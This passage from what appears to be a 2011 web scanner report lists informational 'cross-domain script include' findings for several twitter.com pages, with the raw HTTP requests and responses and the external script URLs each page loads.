Path:	/miketaylr

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /miketaylr HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225015-365-19064
ETag: "fe6b40f83a3db7f038fdf6a1c2da2712"
Last-Modified: Fri, 28 Jan 2011 14:30:15 GMT
X-Runtime: 0.01247
Content-Type: text/html; charset=utf-8
Content-Length: 50661
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.510. http://twitter.com/miketaylr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/miketaylr

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /miketaylr HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234603-91434-31335
ETag: "7fbf0a40428e7c6c9f63b9ea7ee047da"
Last-Modified: Fri, 28 Jan 2011 17:10:03 GMT
X-Runtime: 0.01243
Content-Type: text/html; charset=utf-8
Content-Length: 51101
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.511. http://twitter.com/miketaylr/status/28450462860574722 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/miketaylr/status/28450462860574722

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /miketaylr/status/28450462860574722 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225015-87669-41148
ETag: "0614e68a07b236446d991d175287ff76"
Last-Modified: Fri, 28 Jan 2011 14:30:15 GMT
X-Runtime: 0.06100
Content-Type: text/html; charset=utf-8
Content-Length: 13700
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWlrZXRheWxy%250AL3N0YXR1cy8yODQ1MDQ2Mjg2MDU3NDcyMjoMY3NyZl9pZCIlODgzNDE0MmFh%250AYjIxNmFlNTQzYjMzMTE1YjIwN2I2OTg6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--7486f8d612e6b798f03b8c042950cee765d57f1e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.512. http://twitter.com/miketaylr/status/28450462860574722 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/miketaylr/status/28450462860574722

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /miketaylr/status/28450462860574722 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:10 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234610-82897-34440
ETag: "e01bb78e27fd3f7a23d32a15b2cfb024"
Last-Modified: Fri, 28 Jan 2011 17:10:10 GMT
X-Runtime: 0.04297
Content-Type: text/html; charset=utf-8
Content-Length: 13569
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWlrZXRheWxy%250AL3N0YXR1cy8yODQ1MDQ2Mjg2MDU3NDcyMjoVaW5fbmV3X3VzZXJfZmxvdzA6%250ADGNzcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6%250AB2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--f6f660c8de153bf735aca570942f67109c3ca923; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.513. http://twitter.com/moxiesoft previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/moxiesoft

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /moxiesoft HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:16:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224184-1250-55880
ETag: "c8b3c0b1df873136d3d1cad3c8b419ff"
Last-Modified: Fri, 28 Jan 2011 14:16:24 GMT
X-Runtime: 0.01726
Content-Type: text/html; charset=utf-8
Content-Length: 51386
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296224183777646; path=/; expires=Fri, 04-Feb-11 14:16:23 GMT; domain=.twitter.com
Set-Cookie: guest_id=129622418451783185; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTRmYjYzZDBkM2FhODQ0MWJmMjI2Y2RiMWRmZjM2NDlmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyGj7zC0B--83af79b56916b6955fc5a806bee986cc03de516e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.514. http://twitter.com/moxiesoft previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/moxiesoft

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /moxiesoft HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234367-88995-55309
ETag: "fe7d0cb97679598c86f9ca6115e84b3f"
Last-Modified: Fri, 28 Jan 2011 17:06:07 GMT
X-Runtime: 0.01530
Content-Type: text/html; charset=utf-8
Content-Length: 51255
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.515. http://twitter.com/onlyjazz previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/onlyjazz

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /onlyjazz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224920-98437-32805
ETag: "a870c25d2bf45fd1f02dca10a6c09b7f"
Last-Modified: Fri, 28 Jan 2011 14:28:40 GMT
X-Runtime: 0.00899
Content-Type: text/html; charset=utf-8
Content-Length: 49524
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
